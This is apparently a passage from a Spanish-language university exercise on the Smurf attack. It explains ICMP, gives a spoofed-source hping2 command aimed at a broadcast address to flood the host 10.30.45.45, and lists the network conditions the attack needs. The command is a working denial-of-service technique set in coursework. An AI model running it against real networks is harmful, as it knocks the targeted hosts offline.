El protocolo ICMP es el encargado de realizar el control de flujo de los datagramas IP que circulan por Internet. Este protocolo consta de diversas funcionalidades que permiten desde la comunicacin de situaciones anmalas (no se ha podido realizar la entrega del paquete IP) hasta la comprobacin del estado de una mquina en Internet (ping - pong o ECHO - ECHO REPLY). Este tipo de ataque se basa en falsear las direcciones de origen y destino de una peticin ICMP de ECHO (ping). Como direccin de origen colocamos la direccin IP de la mquina que va a ser atacada. En el campo de la direccin de destino situamos la direccin broadcast de la red local o red que utilizaremos como lanzadera para colapsar al sistema elegido. Con esta peticin fraudulenta, se consigue que todas las mquinas de la red contesten a la vez a una misma mquina, consumiendo el ancho de banda disponible y saturando al ordenador elegido.

2) Suponiendo que nos encontramos en la red del apartado anterior, indicad y comentad la instruccin hping2 que usarais para lanzar un ataque Smurf contra la mquina 10.30.45.45
Despus de leer la documentacin del comando en http://www.hping.org/manpage.html y en el man del knoppix he llegado a la conclusin de que un posible comando vlido sera:
root@ttyp1[knoppix]# hping2 --icmp -a 10.30.45.45 10.30.255.255 Warning: Unable to guess the output interface HPING 10.30.255.255 (lo 10.30.255.255): icmp mode set, 28 headers + 0 data bytes [send_ip] sendto: Network is unreachable

El comando nos da un error porque no encuentra la IP de destino 10.30.255.255 (la direccin de broadcast de la red) al hacer la peticin desde mi ordenador local. En el comando especificamos que la peticin es de tipo ICMP (--icmp), la direccin IP de origen falseada para que sea la de la vctima (-a 10.30.45.45) y la IP de destino falseada para que sea la direccin de difusin de la red local (10.30.255.255).

3) Qu requisitos deben cumplirse para que el ataque sea efectivo?

Es necesario que en la red de la que forma parte la mquina vctima, est habilitado

31 de 32

el poder mandar mensajes a la red de difusin (el router o dispositivo de red las admita y las gestione para mandarlas al resto de mquinas de la red), adems tambin es necesario que en esta misma red se puedan mandar peticiones ICMP de tipo echo-request.

32 de 32